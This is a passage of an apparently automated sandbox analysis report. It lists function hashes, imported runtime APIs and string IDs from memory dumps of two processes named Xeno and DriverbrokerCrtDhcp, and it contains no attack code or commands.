                                                                                      • Opcode Fuzzy Hash: 632681c2061b277c5d70717be25f9f4338a33d6bc708ea27c4336cf21d4a4ca7
                                                                                      • Instruction Fuzzy Hash: 6C01E824E48A07C6F7159B65A85433922A5FF59B84F00013EDD5DCA290FEBCE88CCB62
                                                                                      APIs
                                                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 00007FF68D5F3A4A
                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68D5F3CE9), ref: 00007FF68D5F3CAE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: __except_validate_context_recordabort
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 746414643-3733052814
                                                                                      • Opcode ID: e3a4a0259cb965a332d785ee685cc1b9c4e377a60525cbc42dc7a521f5a24e84
                                                                                      • Instruction ID: 3eb54a74f25428e91942c50f671eed19d01e019a84ac876ded48756cbe3224a6
                                                                                      • Opcode Fuzzy Hash: e3a4a0259cb965a332d785ee685cc1b9c4e377a60525cbc42dc7a521f5a24e84
                                                                                      • Instruction Fuzzy Hash: CC81A072508681C6FB608F25944436D7BA1FF44B84F04813AEE8C8BB89EE7CD599C752
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 2395640692-1018135373
                                                                                      • Opcode ID: f2318c7a055a6079a0dbd8a9a1657cfcd3cd3fbf5b3a6c1e41c49ccf07b950e3
                                                                                      • Instruction ID: 514414c1d0510fb3232f045d6a480030fcb18a5f779930e72c36ee12eee37f2a
                                                                                      • Opcode Fuzzy Hash: f2318c7a055a6079a0dbd8a9a1657cfcd3cd3fbf5b3a6c1e41c49ccf07b950e3
                                                                                      • Instruction Fuzzy Hash: AC519F72B19602CAEB148B15E444A7C3791FF44B98F10853ADE4ACB788EFBCE849C711
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF68D5F2970: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68D5F2316), ref: 00007FF68D5F2983
                                                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 00007FF68D5F3F7A
                                                                                      • _CreateFrameInfo.LIBVCRUNTIME ref: 00007FF68D5F3FA3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                      • String ID: csm
                                                                                      • API String ID: 2466640111-1018135373
                                                                                      • Opcode ID: ccf39f6b81b850e387033f07419b21d592ac85287455093a17eea57b1d99f89b
                                                                                      • Instruction ID: 19da07e422f3d78c9fb114a4ab423aa0aecdedb2e2f6dbf5817dd687e6fa36fb
                                                                                      • Opcode Fuzzy Hash: ccf39f6b81b850e387033f07419b21d592ac85287455093a17eea57b1d99f89b
                                                                                      • Instruction Fuzzy Hash: 70518D76618745C6E620AB15E54026E77B4FB88B90F00053AEF8C8BB55EF78E4A4CB12
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcsncmp$_invalid_parameter_noinfo_noreturn
                                                                                      • String ID: )
                                                                                      • API String ID: 1270597861-2427484129
                                                                                      • Opcode ID: 30cab0a8b37a9af946f2d0825c3a12b9f72c8937212c1dc331fe0a8d7b57daae
                                                                                      • Instruction ID: 6f9c304c4f9eb96b5df9d94d423c0949cb5cd3b20dd711b3c221ddb2ff54ad92
                                                                                      • Opcode Fuzzy Hash: 30cab0a8b37a9af946f2d0825c3a12b9f72c8937212c1dc331fe0a8d7b57daae
                                                                                      • Instruction Fuzzy Hash: D8519521908A85C0F6259B28E4063FD63A0FF99794F045236DE9C96269FF7DE1CACB11
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _errnowcstoul
                                                                                      • String ID: invalid stoul argument$stoul argument out of range
                                                                                      • API String ID: 4037081904-1365241121
                                                                                      • Opcode ID: 235824eda5d1bbbe9c5d1741840db80cccd0729cccf95e470c3edaf06b06b458
                                                                                      • Instruction ID: e6573b5374e9cbb035bf54957fe8f22aeebe0ee217417dcf6d4d3cadc8fd0c42
                                                                                      • Opcode Fuzzy Hash: 235824eda5d1bbbe9c5d1741840db80cccd0729cccf95e470c3edaf06b06b458
                                                                                      • Instruction Fuzzy Hash: 29110A25908601C1DB54AB21E4803B823A0FF84760F480536DF2D8BBD5EF7CE489D712
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: terminate
                                                                                      • String ID: MOC$RCC$csm
                                                                                      • API String ID: 1821763600-2671469338
                                                                                      • Opcode ID: 94ce648c22d0cacb220361a3c4b44e3732c2cb9c128cf18046935c39d1eb8ba8
                                                                                      • Instruction ID: 61395428e896d665266a7445e34f0eb581347195ef90c2477c716691d12f6e53
                                                                                      • Opcode Fuzzy Hash: 94ce648c22d0cacb220361a3c4b44e3732c2cb9c128cf18046935c39d1eb8ba8
                                                                                      • Instruction Fuzzy Hash: 64F08C7A95824AC1E3249F10B24506C3364FF49744F18947ADF58CB292EFBCE894CA63
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E1756
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E17FE
                                                                                        • Part of subcall function 00007FF68D5F0D08: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E1BAF), ref: 00007FF68D5F0D22
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E1843
                                                                                      • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF68D5E186D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_destroymalloc
                                                                                      • String ID:
                                                                                      • API String ID: 2647511316-0
                                                                                      • Opcode ID: e695c79c2d050c280309a69725b70547ea0a5e47803c5606a331380bee7622c4
                                                                                      • Instruction ID: f3d06a9bf62f65a323cfd3a21bea19e0fb3a0c81a6bbf872cffd06e773f16ec5
                                                                                      • Opcode Fuzzy Hash: e695c79c2d050c280309a69725b70547ea0a5e47803c5606a331380bee7622c4
                                                                                      • Instruction Fuzzy Hash: AC91C322F18B41C9FB109BA4D4403EC2371BF54798F54423ADE6D96B99EE78A099C351
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F6714
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F6784
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F67F4
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F6864
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                      • String ID:
                                                                                      • API String ID: 3668304517-0
                                                                                      • Opcode ID: 3a528b978d54263c84e02068a586c8d6fe272a3c609bdb9429f03c962e735b4a
                                                                                      • Instruction ID: fb0a0a59b67062dde89f5dc5b32cd964fdff32d2a23483c2aa011783ed2c498c
                                                                                      • Opcode Fuzzy Hash: 3a528b978d54263c84e02068a586c8d6fe272a3c609bdb9429f03c962e735b4a
                                                                                      • Instruction Fuzzy Hash: BD416DA4E09687D0FA049B2DE88437D13A1FF48BC4F90543AD94D9A565FEBCA9CCD321
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: e92f1acfccab1450a028a97d4294f87ee012edefc36bb0478250a4ff7575481d
                                                                                      • Instruction ID: c20d641748d905fb15be5f7b7083b815b194bcdd4e79c41cc5ae75a4efff15a5
                                                                                      • Opcode Fuzzy Hash: e92f1acfccab1450a028a97d4294f87ee012edefc36bb0478250a4ff7575481d
                                                                                      • Instruction Fuzzy Hash: 79114F22B14F05CAEB008B60E8446A833A4FB18B58F440D35EE5D86754EF7CD19CC350
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                      • String ID: \\?\
                                                                                      • API String ID: 73155330-4282027825
                                                                                      • Opcode ID: 58e19ee06cd3888d1c8f0c359d90a8b184b87b30e04aba91814ed1d7f53a7290
                                                                                      • Instruction ID: 54cadb46ee45068146508afe43fc207a81faa1ba06c5e23fb77bc207a733ff16
                                                                                      • Opcode Fuzzy Hash: 58e19ee06cd3888d1c8f0c359d90a8b184b87b30e04aba91814ed1d7f53a7290
                                                                                      • Instruction Fuzzy Hash: 4E31BF62605A45C5EE10AB15A404279A3A1BF04BF4F580B3ADEBD4BBD5FE7CE449C311
                                                                                      APIs
                                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68D5F025E), ref: 00007FF68D5F263C
                                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68D5F025E), ref: 00007FF68D5F267D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                      • String ID: csm
                                                                                      • API String ID: 2573137834-1018135373
                                                                                      • Opcode ID: fac8c9d42dd350efc0dfb88de78fe394cb7a7c0c849b04581a4650b2b10cfa14
                                                                                      • Instruction ID: 6e9615c54c042dc7e02b2e721702bd767c28212312dd67421106efb25acdb8d7
                                                                                      • Opcode Fuzzy Hash: fac8c9d42dd350efc0dfb88de78fe394cb7a7c0c849b04581a4650b2b10cfa14
                                                                                      • Instruction Fuzzy Hash: 96116D32608B4182EB618F15F80026977E0FF88B84F584239DE8C8B758EF7CC555CB10
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF68D5F2979,?,?,?,?,00007FF68D5F2316), ref: 00007FF68D5F29AB
                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF68D5F2979,?,?,?,?,00007FF68D5F2316), ref: 00007FF68D5F2A32
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true
                                                                                      • Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0
                                                                                      • Opcode ID: d7b08301a7bdf6a43736a8eaf15f43822576de2ab389cfee17f58cab7eb63aba
                                                                                      • Instruction ID: 94858482ea6df302d4901dcb22cfca7503ec87007b06a4b302da61b6db9644c4
                                                                                      • Opcode Fuzzy Hash: d7b08301a7bdf6a43736a8eaf15f43822576de2ab389cfee17f58cab7eb63aba
                                                                                      • Instruction Fuzzy Hash: 1E119061E58306C1FA249721E8001392291BF48BE0F04463EED6EDB7D5FEBCB899C621
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b1ad14ca7143aa0c224bf6e42f29ba047b4dcaf7f1dc34fb6beabcf6cfa3c43e
                                                                                      • Instruction ID: 1a9096686e476349747047eee6564321747ea3bacf6880728d125536a082542b
                                                                                      • Opcode Fuzzy Hash: b1ad14ca7143aa0c224bf6e42f29ba047b4dcaf7f1dc34fb6beabcf6cfa3c43e
                                                                                      • Instruction Fuzzy Hash: 61F16C30F0865A8BDB58DB58C4B5ABCBBA1FF59310F1881BED51ED7292CE3C69419B40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a9e013b6a168d2e0445ba74ebc4a28ef9c0bec713720ad0526cbc54b8f918ec
                                                                                      • Instruction ID: b1bd04c0e3ddec7f6c486b42d252b24ca6268e006e774584e879f103deca102f
                                                                                      • Opcode Fuzzy Hash: 3a9e013b6a168d2e0445ba74ebc4a28ef9c0bec713720ad0526cbc54b8f918ec
                                                                                      • Instruction Fuzzy Hash: 6E91BF71A08A899FF794EB98C8B97E97FE1FF95304F14017AD009D72A2DF7928098740
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: d
                                                                                      • API String ID: 0-2564639436
                                                                                      • Opcode ID: d6226ace85ffab0076367afedea7261cbbcdf6afd6a06ef4eac36b270e4d7995
                                                                                      • Instruction ID: 5f3d1473ebc17a739c9fc1221280db8cd53d008a76931f4d7c025fb7a59fd811
                                                                                      • Opcode Fuzzy Hash: d6226ace85ffab0076367afedea7261cbbcdf6afd6a06ef4eac36b270e4d7995
                                                                                      • Instruction Fuzzy Hash: 1E323231A0CB464FE759DB68D8A15B977E0FF56314B1842BAD189C7293DE38F8438B81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: s/
                                                                                      • API String ID: 0-1274184688
                                                                                      • Opcode ID: 3704ff376047ec6e263455a4ac74e40b0d4f1969502426519b8459159b375db1
                                                                                      • Instruction ID: f1d81069b8dd79496b6c38efb0218d2964b32f2c70f8f2fae24e4729e2dc9df4
                                                                                      • Opcode Fuzzy Hash: 3704ff376047ec6e263455a4ac74e40b0d4f1969502426519b8459159b375db1
                                                                                      • Instruction Fuzzy Hash: FB813635B0CA424FE72D6A2998A11BD77E0EF47310B1401BFD58EC3283CE2CB802A751
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: de21a5d5ccb93642e67598c8ae856d61cfa8417a3b060abd84efc7579093b537
                                                                                      • Instruction ID: 7b55a5aa2c5eeb8eb0672093b04a5f25139fb084d3c13018e52f7ba3d95e0159
                                                                                      • Opcode Fuzzy Hash: de21a5d5ccb93642e67598c8ae856d61cfa8417a3b060abd84efc7579093b537
                                                                                      • Instruction Fuzzy Hash: B9515831E0860A8FDB59DB99C4A15BDB7B1FF5A314F1481BBC11AE7292CB3C6906DB40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: ab5415fba0f7ef684a8388f8c3e2006bfa8dbecf787a54541918eaeb92978ee8
                                                                                      • Instruction ID: fbec1b0fd6ed1f14a58b33593845afe135d0ff3800b243a05dd54dbbe47d951a
                                                                                      • Opcode Fuzzy Hash: ab5415fba0f7ef684a8388f8c3e2006bfa8dbecf787a54541918eaeb92978ee8
                                                                                      • Instruction Fuzzy Hash: 59516D71E0860A9FDB59DF9AD8A15FDB7B1FF5A300F1441BAC10AE7282CA386901DB51
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 87510ef4ad9ccfafa28cdf45c8daa9e103680d7ff8f6df681d2d52d08aa92767
                                                                                      • Instruction ID: fb9066fbfbcae27b70af7de461814e10a5da1642ce5a566729d0a0924df6f720
                                                                                      • Opcode Fuzzy Hash: 87510ef4ad9ccfafa28cdf45c8daa9e103680d7ff8f6df681d2d52d08aa92767
                                                                                      • Instruction Fuzzy Hash: E6517D72E0850A8FDB59DB98C8A55FDB7B1FF4A300F1441BED11AE7282DB396805DB40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 17eb319b27a716a792753027779cbe8a973b04746a80e2970b648e33e24df4b0
                                                                                      • Instruction ID: f0221b003228dd8224570df5b9056d897400de7938d756e670fc560b0ac2597a
                                                                                      • Opcode Fuzzy Hash: 17eb319b27a716a792753027779cbe8a973b04746a80e2970b648e33e24df4b0
                                                                                      • Instruction Fuzzy Hash: 25415971E0854A9FEB59CB99C4A45BDBBB1FF5A300F5041FAD11AE7282CA386905DF40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: bca6cb42c24c6ffa01e95d77ab87b64b38f29b81a00c3c7d24c2205f65d9f0f5
                                                                                      • Instruction ID: 31d7ca0703d3460d15dee6ae30423503f83a0ad7dcf25556cdf5d2e27629bae3
                                                                                      • Opcode Fuzzy Hash: bca6cb42c24c6ffa01e95d77ab87b64b38f29b81a00c3c7d24c2205f65d9f0f5
                                                                                      • Instruction Fuzzy Hash: 32413632E0864A8FDB49DB94C4A05FDB7B1FF46300F1441BED51AE7292CA396906DB00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P|5
                                                                                      • API String ID: 0-469658915
                                                                                      • Opcode ID: 2df01d14f31d44e3a60c93c374b702059d6a73ceda1e0907a74b39447322d658
